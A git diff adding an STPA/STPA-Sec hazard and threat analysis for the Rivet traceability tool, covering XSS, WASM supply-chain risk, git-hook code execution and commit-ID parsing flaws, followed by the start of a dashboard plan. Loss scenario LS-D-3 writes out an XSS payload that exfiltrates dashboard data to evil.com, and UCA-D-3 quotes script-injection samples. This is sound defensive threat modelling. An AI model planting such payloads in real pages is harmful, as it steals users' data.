+ hazards: [H-13] + + - id: SC-16 + title: Rivet must validate WASM adapter outputs against the source data independently + description: > + After a WASM adapter returns imported artifacts, the host must + verify that: (a) the number of returned artifacts is consistent + with the source data size, (b) all returned artifact IDs conform + to expected patterns, (c) no artifact IDs were injected that do + not correspond to source records. Schema validation alone is + insufficient because a compromised adapter could produce + schema-conforming but fabricated artifacts. + hazards: [H-14] + + - id: SC-17 + title: Rivet commit analysis must validate extracted artifact IDs against the known artifact set before counting coverage + description: > + The commit traceability engine must not count artifact references + that do not resolve to known artifacts in the store as coverage. + The is_artifact_id() heuristic must be supplemented with a + store.contains() check. Unresolved references must be reported + as broken refs, not counted as coverage. + hazards: [H-15] + + - id: SC-18 + title: Rivet dashboard must report reload failures and indicate stale data state + description: > + When a dashboard reload fails (due to YAML parse errors, schema + load failures, or filesystem issues), the server must: (a) return + an error response to the reload request, (b) display a visible + "stale data" banner on all dashboard pages until a successful + reload occurs, (c) log the specific error that caused the reload + failure. + hazards: [H-16] + + - id: SC-19 + title: Rivet must not execute git clone/fetch against untrusted URLs without user confirmation + description: > + The externals sync operation must validate git URLs against an + allowlist or require explicit user confirmation before cloning + new repositories. Git clone operations must disable hooks in the + cloned repository (--config core.hooksPath=/dev/null) to prevent + arbitrary code execution. 
+ hazards: [H-17] +``` + +### Step 4: New UCAs + +#### 4a. UCAs for Existing Controllers Needing Extension + +**CTRL-DASH (Dashboard) — Document Rendering:** + +```yaml +# Additional dashboard UCAs for document/HTML rendering + + - id: UCA-D-3 + description: > + Dashboard renders artifact description content containing HTML + injection without escaping. + context: > + An artifact's description field contains `<script>alert('xss')</script>` + or `<img onerror="...">`. The dashboard detail view renders this + content as raw HTML. + hazards: [H-13] + rationale: > + Script injection in the dashboard compromises the integrity of + all displayed traceability data for the current session. + + - id: UCA-D-4 + description: > + Dashboard does not display reload errors when hot-reload fails. + context: > + User clicks reload, a YAML parse error occurs in one file, + but the dashboard returns a success response and continues + showing the old state. + hazards: [H-16] + rationale: > + User believes they are viewing current data when the dashboard + is serving stale state from before the edit. +``` + +**CTRL-CORE — Commit Traceability:** + +```yaml +# Additional core UCAs for commit traceability + + - id: UCA-C-18 + description: > + Core commit analysis extracts false-positive artifact IDs from + trailer values that match the PREFIX-DIGITS pattern but are not + actual artifact identifiers. + context: > + A commit trailer contains "Implements: ISO-26262 compliance" and + the pattern matcher extracts "ISO-26262" as an artifact ID. + hazards: [H-15] + rationale: > + False positive artifact references inflate commit coverage + metrics, creating an illusion of implementation completeness. + + - id: UCA-C-19 + description: > + Core commit analysis fails to extract artifact IDs that use + sub-hazard notation (e.g., "H-1.2") or multi-letter suffixes + (e.g., "UCA-C-10"). 
+ context: > + A commit trailer contains "Refs: H-1.2, UCA-C-10" but the + is_artifact_id() function requires digits-only after the hyphen, + so neither ID is extracted. + hazards: [H-15, H-1] + rationale: > + False negative artifact references create coverage gaps. STPA + artifacts (the most safety-critical) are systematically missed + by the commit traceability engine. + + - id: UCA-C-20 + description: > + Core does not detect circular cross-repo dependencies during + external artifact loading. + context: > + Repo A declares repo B as external, and repo B declares repo A. + The sync process enters an infinite loop or stack overflow. + hazards: [H-11, H-1] + rationale: > + Circular dependencies cause the tool to hang or crash during + sync, preventing any validation from completing. +``` + +**CTRL-CORE — WASM Runtime:** + +```yaml +# Additional core UCAs for WASM adapter runtime + + - id: UCA-C-21 + description: > + Core WASM runtime does not validate that adapter-returned + artifacts correspond to actual records in the source data. + context: > + A WASM adapter returns 500 artifacts from a source file that + contains only 50 records. The additional 450 are fabricated. + hazards: [H-14] + rationale: > + Fabricated artifacts pass schema validation because they + conform to the declared types, but they introduce false + traceability links that inflate coverage. + + - id: UCA-C-22 + description: > + Core WASM runtime does not enforce fuel limits, allowing a + malicious adapter to consume unbounded CPU. + context: > + Fuel metering is configured but a bug in the fuel accounting + allows the adapter to execute indefinitely, causing a denial + of service. + hazards: [H-14] + rationale: > + Denial of service during import blocks all validation and + reporting operations. + + - id: UCA-C-23 + description: > + Core WASM runtime leaks host filesystem paths to the guest + adapter via WASI preopened directories. 
+ context: > + The adapter is given access to the AADL directory via WASI + preopened dirs. The adapter reads files outside the intended + scope by exploiting symlinks or relative paths. + hazards: [H-14, H-17] + rationale: > + Information disclosure of host filesystem structure aids + further attacks. Arbitrary file read enables data exfiltration. +``` + +**CTRL-CORE — Lifecycle / Coverage:** + +```yaml + - id: UCA-C-24 + description: > + Core lifecycle completeness check uses a hardcoded downstream + type map that does not reflect the loaded schema's traceability + rules. + context: > + The lifecycle.rs module hardcodes expected_downstream() mappings + (requirement -> [feature, aadl-component, design-decision]). + A project using the cybersecurity schema has different downstream + expectations (e.g., threat-scenario -> countermeasure) that are + not represented. + hazards: [H-3, H-1] + rationale: > + Lifecycle gap analysis produces false negatives for schemas + other than the dev schema, missing genuine coverage gaps in + cybersecurity and STPA domains. +``` + +**CTRL-CORE — Document Validation:** + +```yaml + - id: UCA-C-25 + description: > + Core document validation only checks [[ID]] references but does + not validate {{artifact:ID}} embed references. + context: > + A document uses {{artifact:NOPE-999}} which renders as a broken + embed card in the dashboard, but validate_documents() does not + check this pattern, so no diagnostic is emitted. + hazards: [H-1, H-3] + rationale: > + Broken artifact embeds in documents are invisible to validation, + producing documents that appear complete but contain broken + references. +``` + +**CTRL-CLI — External Sync:** + +```yaml + - id: UCA-L-6 + description: > + CLI sync command executes git clone against an arbitrary URL from + rivet.yaml without validating the URL or disabling git hooks. + context: > + A developer opens a project with a modified rivet.yaml containing + a malicious git URL. 
Running `rivet sync` clones the repository, + which includes a post-checkout hook that executes arbitrary code. + hazards: [H-17] + rationale: > + The rivet.yaml file is the trust boundary for external + dependencies. A compromised config file enables arbitrary + code execution on the developer's machine. + + - id: UCA-L-7 + description: > + CLI does not validate rivet.lock file integrity before using + pinned commit SHAs for external sync. + context: > + An attacker modifies rivet.lock to point to a different commit + SHA that contains compromised artifacts. The sync operation + checks out the attacker-controlled commit. + hazards: [H-17, H-14] + rationale: > + The lock file is meant to ensure reproducible baselines. + If it can be tampered with undetected, the baseline guarantee + is void. +``` + +### Step 5: Loss Scenarios + +#### 5a. Loss Scenarios for Existing UCAs Currently Lacking Them + +The following UCAs (UCA-C-10 through UCA-C-17) were identified as having no loss scenarios in `loss-scenarios.yaml`: + +```yaml +# Proposed additions to safety/stpa/loss-scenarios.yaml + + # --- Incremental validation UCAs --- + + - id: LS-C-5 + title: Salsa input query not updated after file write + uca: UCA-C-10 + type: inadequate-process-model + hazards: [H-9, H-1, H-3] + scenario: > + The developer edits an artifact YAML file and saves it to disk. + The salsa database's file-content input query was set when the + file was first read. Because there is no file-watcher or + explicit invalidation call between validation invocations in + the same process (e.g., during `rivet serve`), the salsa + database returns the cached parse result from the old file + contents [UCA-C-10]. The link graph and validation diagnostics + reflect the pre-edit state. The dashboard shows "0 errors" + while the file on disk contains broken links [H-1, H-3]. 
+ process-model-flaw: > + The salsa database believes its file-content input still + matches the on-disk content because no explicit set_file_content() + call was made after the file was modified externally. + causal-factors: + - No file-system watcher to detect external file modifications + - Salsa inputs are set once at load time, not refreshed + - Dashboard reload may not invalidate all salsa inputs + + - id: LS-C-6 + title: Conditional rule evaluation uses cached field values + uca: UCA-C-11 + type: inadequate-process-model + hazards: [H-9, H-1] + scenario: > + A schema defines a conditional rule: "when status == approved, + verification-criteria is required." An artifact has status=draft + and no verification-criteria field. The salsa database caches + the rule evaluation result as "not applicable" (because + status != approved). The developer changes the artifact's status + to "approved" but does not add verification-criteria. Because + the salsa conditional-rule query depends only on the rule + definition (not the artifact's field values), the cached "not + applicable" result is returned [UCA-C-11]. The artifact passes + validation despite missing the required field [H-1]. + process-model-flaw: > + The salsa query for conditional rule evaluation does not track + the artifact's field values as dependencies. It only depends + on the rule definition, so field value changes don't trigger + re-evaluation. 
+ causal-factors: + - Conditional rule query does not declare artifact fields as inputs + - Salsa dependency tracking is opt-in per query + - No test verifies conditional rule re-evaluation after field change + + - id: LS-C-7 + title: Contradictory conditional rules not detected at schema load + uca: UCA-C-12 + type: inadequate-control-algorithm + hazards: [H-10] + scenario: > + A project uses two schema files: the ASPICE schema requires + "verification-method" when status=approved, while a custom overlay + schema forbids "verification-method" when safety-level=QM (to + reduce overhead for non-safety items). An artifact with both + status=approved and safety-level=QM triggers both rules. The + schema merge algorithm does not check for rule conflicts [UCA-C-12]. + The developer sees two contradictory validation errors and disables + one rule via a schema override, undermining the validation system. + causal-factors: + - Schema merge is purely additive (union of all rules) + - No SAT-solver or constraint check for rule compatibility + - Conditional rules lack a priority or override mechanism + + - id: LS-C-8 + title: Incremental validation diverges from full validation after rename + uca: UCA-C-13 + type: inadequate-control-algorithm + hazards: [H-9, H-3] + scenario: > + A developer renames an artifact from REQ-042 to REQ-042a. The + salsa database invalidates the queries for the renamed artifact's + file. However, other artifacts that link to REQ-042 are in + different files whose salsa inputs have not changed. The + incremental validation for those files returns cached "valid" + results that still show links to REQ-042 as resolved [UCA-C-13]. + A full validation would detect the broken links. The dashboard + shows 0 errors while a clean `rivet validate` shows 3 broken + links. 
+ causal-factors: + - Link resolution queries depend on the link graph, not individual files + - Salsa does not track cross-file artifact ID dependencies + - No periodic full-revalidation check is implemented + + - id: LS-C-9 + title: Schema loading races with conditional rule evaluation + uca: UCA-C-14 + type: inadequate-control-algorithm + hazards: [H-9, H-10] + scenario: > + The project loads schemas from three files: common.yaml, + dev.yaml, and custom-overlay.yaml. The salsa query graph allows + conditional rule evaluation to begin as soon as two schemas are + merged (common + dev), before the overlay is loaded. The overlay + adds a conditional rule that restricts certain field combinations. + Artifacts evaluated before the overlay loads pass validation + [UCA-C-14]. After the overlay loads, those same artifacts would + fail. The final validation result depends on evaluation order, + making it non-deterministic. + causal-factors: + - Schema merge is incremental (file-by-file) rather than all-at-once + - No barrier between "all schemas loaded" and "evaluation begins" + - Salsa query ordering is determined by demand, not explicit sequencing + + - id: LS-C-10 + title: Parser extracts registry version instead of git_override commit + uca: UCA-C-15 + type: inadequate-control-algorithm + hazards: [H-11, H-1] + scenario: > + A MODULE.bazel file declares `bazel_dep(name="meld", version="2.0")` + and separately `git_override(module_name="meld", commit="abc123")`. + The parser extracts the bazel_dep declaration and records + meld@2.0. It does not process the git_override because the + function name is not in its recognized set [UCA-C-15]. Cross-repo + validation loads meld@2.0 from the registry cache instead of + the pinned commit abc123. The traceability data comes from the + wrong version of meld, and coverage results are meaningless [H-1]. 
+ causal-factors: + - Parser's function recognition list is incomplete + - git_override is parsed separately from bazel_dep with no linkage + - No test covers the override-applies-to-dep scenario + + - id: LS-C-11 + title: Parser silently skips load() statement containing dependency + uca: UCA-C-16 + type: inadequate-control-algorithm + hazards: [H-11] + scenario: > + A MODULE.bazel file uses `load("@rules_rust//rust:defs.bzl", "rust_library")` + followed by a macro call that declares additional bazel_deps. + The parser does not recognize load() statements and silently + skips the line [UCA-C-16]. The macro-declared dependencies are + invisible to Rivet. Cross-repo links to artifacts in those + repos are reported as broken when they actually exist in the + undiscovered external repos. + causal-factors: + - Starlark load() support is not implemented + - Parser treats unrecognized lines as comments + - No diagnostic emitted for skipped lines + + - id: LS-C-12 + title: Parser swaps keyword argument name and value + uca: UCA-C-17 + type: inadequate-control-algorithm + hazards: [H-11, H-1] + scenario: > + A MODULE.bazel file contains `bazel_dep(version="1.0", name="meld")`. + The parser assumes positional argument order (name first, version + second) rather than parsing keyword arguments [UCA-C-17]. It + extracts name="1.0" and version="meld". The dependency is + recorded with the wrong module name, causing cross-repo + resolution to fail silently or resolve against the wrong repo. + causal-factors: + - Parser uses positional extraction rather than keyword matching + - No unit test for non-standard argument ordering + - CST construction assumes a fixed parameter order +``` + +#### 5b. Loss Scenarios for New UCAs + +```yaml + - id: LS-D-3 + title: Artifact description XSS via dashboard rendering + uca: UCA-D-3 + type: inadequate-control-algorithm + hazards: [H-13] + scenario: > + A developer creates an artifact with description containing + `<img src=x onerror="fetch('/api/export').then(r=>r.text()).then(d=>fetch('https://evil.com/?data='+btoa(d)))">`. + The dashboard's artifact detail view is expected to escape this + description via html_escape(). However, the html_escape function + in document.rs is only called for + markdown inline text, not for the artifact detail view in + serve.rs, which may interpolate the description directly into + HTML. The script executes in the auditor's browser, exfiltrating + the current traceability view [H-13, L-2, L-3]. + causal-factors: + - Multiple rendering paths with inconsistent escaping + - serve.rs generates HTML via string formatting, not a template engine + - No Content-Security-Policy header to mitigate XSS + + - id: LS-C-13 + title: WASM adapter returns fabricated artifacts + uca: UCA-C-21 + type: inadequate-process-model + hazards: [H-14] + scenario: > + A WASM adapter component is loaded from a .wasm file distributed + as a binary. The adapter's import() function is called with a + ReqIF source file containing 50 SpecObjects. The adapter returns + 80 artifacts — the original 50 plus 30 fabricated artifacts with + valid-looking IDs (REQ-051 through REQ-080) that link to + existing requirements, inflating coverage metrics [UCA-C-21]. + The host has no way to verify the count because the source data + format is adapter-specific. Schema validation passes because the + fabricated artifacts have valid types and fields. + process-model-flaw: > + The host trusts that the adapter's output faithfully represents + the source data. There is no independent verification mechanism + because the host cannot parse the adapter-specific source format. 
+ causal-factors: + - WASM adapter output is trusted without independent verification + - No artifact-count or hash-based integrity check on adapter output + - Binary WASM components cannot be source-reviewed by users + + - id: LS-C-14 + title: Commit trailer false positive from non-artifact ID + uca: UCA-C-18 + type: inadequate-control-algorithm + hazards: [H-15] + scenario: > + A commit message contains the trailer "Refs: ISO-26262, MISRA-C2012". + The is_artifact_id() function matches any string with uppercase + prefix + hyphen + digits. "ISO-26262" matches (prefix="ISO", + suffix="26262") and is extracted as an artifact reference [UCA-C-18]. + The store does not contain "ISO-26262", so it is counted as a + broken reference. However, in the commit analysis summary, it + inflates the "linked commits" count because the commit has at + least one artifact reference (even though it's a false positive). + causal-factors: + - is_artifact_id() uses an overly broad pattern + - No validation against the actual artifact store during extraction + - Standard identifiers (ISO numbers, MISRA rules) match the pattern + + - id: LS-L-3 + title: Git clone executes malicious post-checkout hook + uca: UCA-L-6 + type: control-path + hazards: [H-17] + scenario: > + An attacker submits a PR that modifies rivet.yaml to add an + external dependency pointing to a malicious git repository. + The repository contains a .git/hooks/post-checkout script that + exfiltrates SSH keys or modifies local source files. A reviewer + approves the PR without noticing the rivet.yaml change. When + any developer runs `rivet sync`, git clones the malicious repo + and the post-checkout hook executes with the developer's + permissions [UCA-L-6]. 
+ causal-factors: + - rivet.yaml changes are not flagged as security-sensitive in review + - git clone enables hooks by default + - No URL allowlist or domain restriction for external repos + - sync command does not use --config core.hooksPath=/dev/null + + - id: LS-C-15 + title: Lifecycle check misses cybersecurity downstream requirements + uca: UCA-C-24 + type: inadequate-process-model + hazards: [H-3, H-1] + scenario: > + A project uses the cybersecurity schema with threat-scenario, + countermeasure, and cybersecurity-requirement types. The + lifecycle completeness check in lifecycle.rs only knows about + requirement -> [feature, aadl-component, design-decision] + mappings. Cybersecurity requirements have no expected downstream + types in the hardcoded map [UCA-C-24]. The lifecycle gap analysis + reports 0 gaps for cybersecurity requirements, even though none + have countermeasure links. The safety engineer trusts the + lifecycle check and misses genuine coverage gaps. + process-model-flaw: > + The lifecycle module's process model is hardcoded to the dev + schema's traceability chain, not derived from the loaded schema's + traceability rules. It does not know about cybersecurity or STPA + type hierarchies. 
+ causal-factors: + - expected_downstream() is hardcoded, not derived from schema rules + - No test covers lifecycle checks with non-dev schemas + - The module was written for the dev schema and not generalized +``` + +--- + +## Part 2: STPA-Sec Analysis + +### 2.1 Supply Chain Attack: Compromised WASM Adapter + +| Aspect | Detail | +|--------|--------| +| **Attack surface** | `wasm_runtime.rs` — `WasmAdapter::call_import()`, `call_render()`, `call_analyze()` | +| **Potential impact** | L-1 (fabricated traceability links), L-3 (data exfiltration via WASI), L-5 (false safety assurance from fabricated coverage) | +| **Existing mitigation** | Fuel metering (1B ops), memory limit (256 MiB), WASI preopened dirs are read-only | +| **Missing mitigation** | (1) No code signing or hash verification of .wasm files before loading. (2) No independent verification of adapter output against source data. (3) No sandboxed filesystem — adapter can read any preopened directory. (4) No audit log of adapter invocations and their inputs/outputs. | +| **Recommended constraint** | SC-16 (validate adapter outputs independently). Add: WASM component hash verification against a trusted manifest. | + +### 2.2 Injection Attack: Malicious Artifact Content (XSS) + +| Aspect | Detail | +|--------|--------| +| **Attack surface** | `document.rs` — `render_to_html()`, `resolve_inline()`, `html_escape()`; `serve.rs` — all HTML-generating routes | +| **Potential impact** | L-1 (altered traceability display), L-2 (manipulated audit evidence), L-3 (session/data exfiltration) | +| **Existing mitigation** | `html_escape()` function exists in document.rs and handles `&`, `<`, `>`, `"`. The `parse_markdown_link()` function restricts URLs to http/https/#. | +| **Missing mitigation** | (1) No Content-Security-Policy (CSP) header on the dashboard server. (2) serve.rs generates HTML via `format!()` string interpolation, not a template engine with auto-escaping. 
Each HTML route must manually remember to escape — a single missed interpolation creates an XSS vector. (3) No automated test that verifies HTML output is properly escaped for adversarial inputs. (4) `{{artifact:ID}}` embed rendering constructs HTML from artifact fields with html_escape, but there's no test for nested injection (e.g., artifact title containing quotes that break out of an HTML attribute). | +| **Recommended constraint** | SC-15 (HTML-escape all content). Add: CSP header (`script-src 'self'`), move to a template engine, add XSS-specific test cases. | + +### 2.3 Data Integrity: YAML File Tampering Bypassing Validation + +| Aspect | Detail | +|--------|--------| +| **Attack surface** | YAML artifact files on disk, `store.rs` — `Store::upsert()`, `store.rs` — `Store::insert()` | +| **Potential impact** | L-1 (corrupted traceability), L-3 (unauthorized modification), L-6 (audit trail gaps) | +| **Existing mitigation** | Git history provides an audit trail. `rivet validate` checks schema conformance and link integrity. CI runs validation as a merge gate. | +| **Missing mitigation** | (1) No file integrity checking between validation and report generation — an attacker who can modify files on disk between `rivet validate` and `rivet serve` (or `rivet stats`) can serve unvalidated data. (2) `Store::upsert()` overwrites artifacts without recording what changed or who changed it. (3) No cryptographic hash of the validated state is stored, so there's no way to detect post-validation tampering. | +| **Recommended constraint** | After validation passes, compute a hash of all artifact content. Report generation must verify the hash has not changed. Alternatively, validation and report generation must share the same in-memory state (currently true for `rivet serve` but not for separate CLI invocations). 
| + +### 2.4 Information Disclosure: Export Leaking Internal Paths + +| Aspect | Detail | +|--------|--------| +| **Attack surface** | `model.rs` — `Artifact.source_file`; `serve.rs` — source view routes; `document.rs` — `Document.source_file` | +| **Potential impact** | L-3 (information disclosure of filesystem structure, usernames, internal paths) | +| **Existing mitigation** | `Artifact.source_file` is `#[serde(skip)]` so it's not serialized in YAML exports. | +| **Missing mitigation** | (1) The dashboard source view (`/source/*`) serves raw file content including full filesystem paths in headers/URLs. An attacker with dashboard access sees the full path (e.g., `/Volumes/Home/username/git/project/safety/stpa/losses.yaml`). (2) Git commit information (author name, email, commit SHA) is displayed in the dashboard and would be included in any HTML export. (3) The `build_version()` function in main.rs embeds git branch, commit, and dirty state into the binary — this is visible in `rivet --version` output and potentially in generated reports. | +| **Recommended constraint** | Dashboard should use relative paths, not absolute filesystem paths. HTML exports should strip or anonymize source_file paths. Build metadata should be configurable (allow stripping in release builds). | + +### 2.5 Denial of Service: Pathological Artifact Graphs + +| Aspect | Detail | +|--------|--------| +| **Attack surface** | `links.rs` — `LinkGraph::reachable()`, `LinkGraph::build()`; `serve.rs` — graph visualization routes | +| **Potential impact** | L-4 (engineering productivity loss from hung processes) | +| **Existing mitigation** | `LinkGraph::reachable()` uses a visited-set to prevent infinite loops on cycles. `has_cycles()` uses petgraph's `is_cyclic_directed()`. | +| **Missing mitigation** | (1) `reachable()` uses a `Vec` for the visited set with `contains()` checks, giving O(n^2) performance for large graphs. A project with 10,000+ artifacts could experience significant slowdowns. 
(2) The dashboard graph visualization route computes ego-subgraphs and Sugiyama layouts. For deeply connected graphs, the layout computation could take minutes, with no timeout. (3) No limit on the number of artifacts or links that can be loaded — a malicious YAML file with millions of entries would exhaust memory. | +| **Recommended constraint** | Switch `reachable()` visited set to `HashSet`. Add a configurable timeout for layout computation. Add a configurable limit on artifact/link count with a diagnostic when exceeded. | + +### 2.6 Configuration Tampering: Modified rivet.yaml + +| Aspect | Detail | +|--------|--------| +| **Attack surface** | `rivet.yaml`, `rivet.lock`; `externals.rs` — `sync_external()`; `lib.rs` — `load_project_config()` | +| **Potential impact** | L-3 (data sovereignty via malicious external repos), L-5 (safety assurance via modified schemas) | +| **Existing mitigation** | rivet.yaml is version-controlled in git. Changes are visible in PR diffs. | +| **Missing mitigation** | (1) No schema pinning — if a schema is loaded from a path (not embedded), an attacker who modifies the schema file can weaken validation rules without changing rivet.yaml. (2) No integrity check on embedded schemas — a modified binary with weakened embedded schemas would pass all validation. (3) `rivet.lock` has no signature or checksum, so it can be modified to point to different commit SHAs without detection. | +| **Recommended constraint** | Embedded schemas should include a hash that is verified at load time. rivet.lock should include content hashes of external repo states. Schema files loaded from disk should be verified against expected hashes if available. | + +--- + +## Part 3: OSLC Lifecycle Lens + +### 3.1 Resource Integrity + +**OSLC concern:** Are artifacts complete and consistent? + +| Check | STPA Coverage | Gap? 
| +|-------|--------------|------| +| All artifacts have required fields | SC-1 (validate cross-references), validation in validate.rs checks required fields | No | +| All links resolve to valid targets | SC-1, UCA-C-4 (dangling links) | No | +| Schema conformance | SC-4 (semantic compatibility), UCA-C-6 (wrong schema) | No | +| Cross-repo artifact integrity | SC-10 (external artifact existence), H-11 (MODULE.bazel) | No | +| **Document-artifact consistency** | validate_documents() checks [[ID]] refs | **Gap: {{artifact:ID}} embeds not validated (UCA-C-25)** | + +### 3.2 Change Management + +**OSLC concern:** Are changes tracked and auditable? + +| Check | STPA Coverage | Gap? | +|-------|--------------|------| +| All modifications attributed | SC-7 (audit trail), H-7 (unattributed modification) | No | +| Change history preserved | L-6 (audit trail), git commit history | No | +| Commit-artifact traceability | commits.rs, UCA-C-18/C-19 (extraction errors) | Partial — see H-15 | +| **Configuration change tracking** | | **Gap: rivet.yaml and schema file changes are not tracked as artifact-level events. A schema change that weakens a validation rule has no artifact-level audit trail.** | + +### 3.3 Configuration Management + +**OSLC concern:** Are baselines reproducible? + +| Check | STPA Coverage | Gap? | +|-------|--------------|------| +| Deterministic artifact loading | SC-11 (incremental = full), deterministic file ordering | No | +| Reproducible baselines | externals.rs lock/baseline commands, rivet.lock | No | +| Schema versioning | Schema files have version metadata | No | +| **Build reproducibility** | | **Gap: No STPA analysis covers the scenario where the Rivet binary itself is not reproducible (different compiler flags, different embedded schema versions). Two developers running different Rivet versions against the same artifacts could get different validation results. 
SC-14 partially covers this for formal proofs but not for the tool binary itself.** | + +### 3.4 Quality Management + +**OSLC concern:** Are verification records trustworthy? + +| Check | STPA Coverage | Gap? | +|-------|--------------|------| +| Test results linked to artifacts | results.rs, ResultStore | No | +| Coverage metrics from validated data | SC-3 (coverage from validated data), CC-C-8 | No | +| Report generation gated on validation | SC-6 (compliance reports from verified data), CC-L-2 | No | +| Formal verification of tool correctness | SC-14 (proofs validate implementation), H-12 | No | +| **Dashboard data freshness** | UCA-D-2 (stale metrics) | Partially covered, extended by H-16 | + +--- + +## Part 4: Recommended New YAML Artifacts + +### Priority 1: Immediate (new hazards and constraints) + +1. **Add to `hazards.yaml`:** H-13, H-14, H-15, H-16, H-17, sub-hazards H-13.1, H-13.2 +2. **Add to `system-constraints.yaml`:** SC-15, SC-16, SC-17, SC-18, SC-19 +3. **Add to `control-structure.yaml`:** No new controllers needed yet (the requested CTRL-EXPORT, CTRL-YAML-EDIT, CTRL-SALSA do not exist in the codebase — export.rs, yaml_edit.rs, db.rs are not present on this branch. The analysis covers these concerns under existing controllers.) +4. **Add to `ucas.yaml`:** + - Dashboard: UCA-D-3, UCA-D-4 + - Core: UCA-C-18 through UCA-C-25 + - CLI: UCA-L-6, UCA-L-7 +5. **Add to `controller-constraints.yaml`:** CC-D-3/D-4, CC-C-18 through CC-C-25, CC-L-6/L-7 +6. 
**Add to `loss-scenarios.yaml`:** LS-C-5 through LS-C-15, LS-D-3, LS-L-3 + +### Priority 2: STPA-Sec artifacts (new) + +Create `safety/stpa/security-constraints.yaml` with: +- SEC-1: CSP header on dashboard +- SEC-2: WASM component hash verification +- SEC-3: Git clone hook disabling for externals +- SEC-4: rivet.lock integrity verification +- SEC-5: Artifact count validation for WASM adapter output +- SEC-6: Path anonymization in exports and dashboard + +### Priority 3: OSLC gap remediation + +- Add a hazard (H-18?) for "Rivet schema change weakens validation without artifact-level audit trail" +- Add a constraint (SC-20?) for "Rivet must record schema version and content hash alongside validation results" +- Add a hazard (H-19?) for "Different Rivet binary versions produce different validation results for the same inputs" +- Add a constraint (SC-21?) for "Rivet must embed its version and schema hashes in all generated reports for reproducibility verification" + +--- + +## Summary of Findings + +| Category | Count | Existing | New | +|----------|-------|----------|-----| +| Losses | 6 | 6 | 0 | +| Hazards | 17 (+2 sub) | 12 (+6 sub) | 5 (+2 sub) | +| System constraints | 19 | 14 | 5 | +| Controllers | 7 | 7 | 0 (requested ones don't exist on this branch) | +| UCAs | 47 | 32 | 15 | +| Controller constraints | 44 | 31 | 13 | +| Loss scenarios | 27 | 13 | 14 | +| STPA-Sec findings | 6 | 0 | 6 | +| OSLC gaps | 3 | 0 | 3 | + +### Critical Findings + +1. **XSS in dashboard** (H-13): The dashboard generates HTML via string formatting in serve.rs. While document.rs has html_escape(), the serve.rs routes may have inconsistent escaping. No CSP header is set. This is the highest-impact security finding because the dashboard is used during audit reviews. + +2. **WASM supply chain** (H-14): WASM adapters are loaded as binary blobs without signature verification. The adapter output is trusted without independent verification. 
Fuel and memory limits provide DoS protection but not integrity protection. + +3. **Missing loss scenarios** (UCA-C-10 through UCA-C-17): Eight UCAs related to incremental validation and MODULE.bazel parsing had no loss scenarios. These are now covered by LS-C-5 through LS-C-12. + +4. **Commit traceability false positives** (H-15): The `is_artifact_id()` pattern matches standard identifiers like ISO-26262 and MISRA-C2012. STPA artifact IDs (H-1.2, UCA-C-10) are NOT matched. This systematically excludes safety-critical artifacts from commit coverage. + +5. **Lifecycle check hardcoding** (UCA-C-24): The lifecycle completeness check only knows about the dev schema's type hierarchy. Cybersecurity, STPA, and ASPICE schemas are invisible to it. + +6. **Git clone as code execution vector** (H-17): `rivet sync` clones arbitrary git URLs from rivet.yaml without disabling hooks, creating a path from configuration tampering to arbitrary code execution. diff --git a/docs/plans/2026-03-17-dashboard-component-kit.md b/docs/plans/2026-03-17-dashboard-component-kit.md new file mode 100644 index 0000000..6f50160 --- /dev/null +++ b/docs/plans/2026-03-17-dashboard-component-kit.md @@ -0,0 +1,1403 @@ +# Dashboard Component Kit & Scalability Implementation Plan + +> **For agentic workers:** REQUIRED: Use superpowers:subagent-driven-development (if subagents available) or superpowers:executing-plans to implement this plan. Steps use checkbox (`- [ ]`) syntax for tracking. + +**Goal:** Build a reusable UI component system for the dashboard, fix graph scalability, add URL-persisted view state across all views, and add a print-friendly document mode. + +**Architecture:** Extract shared UI primitives (filter bar, sortable table, fold/unfold tree, pagination) into composable Rust helper functions in a new `serve/components.rs` module. Each component renders HTML fragments and emits query-param-aware URLs so all view state survives reload. 
Graph rendering moves to `spawn_blocking` with a node-count budget and progressive disclosure. A `?print=1` param strips chrome for any view. + +**Tech Stack:** Rust (axum, HTMX), petgraph, etch (Sugiyama layout), inline CSS/JS + +--- + +## File Structure + +| File | Responsibility | +|------|---------------| +| `rivet-cli/src/serve/mod.rs` | Route definitions, AppState, middleware, re-exports | +| `rivet-cli/src/serve/components.rs` | **NEW** — Reusable HTML component functions (filter bar, sortable table, collapsible tree, pagination, graph viewer) | +| `rivet-cli/src/serve/layout.rs` | **NEW** — `page_layout()`, `print_layout()`, CSS constant, context bar | +| `rivet-cli/src/serve/views/mod.rs` | **NEW** — re-export all view handlers | +| `rivet-cli/src/serve/views/index.rs` | **NEW** — `/` and `/stats` | +| `rivet-cli/src/serve/views/artifacts.rs` | **NEW** — `/artifacts`, `/artifacts/{id}`, `/artifacts/{id}/preview` | +| `rivet-cli/src/serve/views/stpa.rs` | **NEW** — `/stpa` with fold/unfold/filter | +| `rivet-cli/src/serve/views/graph.rs` | **NEW** — `/graph`, `/artifacts/{id}/graph` with scalability fixes | +| `rivet-cli/src/serve/views/matrix.rs` | **NEW** — `/matrix`, `/coverage` | +| `rivet-cli/src/serve/views/validate.rs` | **NEW** — `/validate`, `/verification` | +| `rivet-cli/src/serve/views/docs.rs` | **NEW** — `/documents`, `/documents/{id}`, `/doc-linkage` | +| `rivet-cli/src/serve/views/source.rs` | **NEW** — `/source`, `/source/{path}` | +| `rivet-cli/src/serve/views/traceability.rs` | **NEW** — `/traceability`, `/traceability/history` | +| `rivet-cli/src/serve/views/search.rs` | **NEW** — `/search` | +| `rivet-cli/src/serve/views/results.rs` | **NEW** — `/results`, `/results/{run_id}` | +| `rivet-cli/src/serve/views/help.rs` | **NEW** — `/help/*` routes | +| `rivet-cli/src/serve/views/diff.rs` | **NEW** — `/diff` | +| `rivet-cli/src/serve/js.rs` | **NEW** — JavaScript constants: JS (main), SEARCH_JS, AADL_JS | +| `rivet-cli/src/serve/styles.rs` 
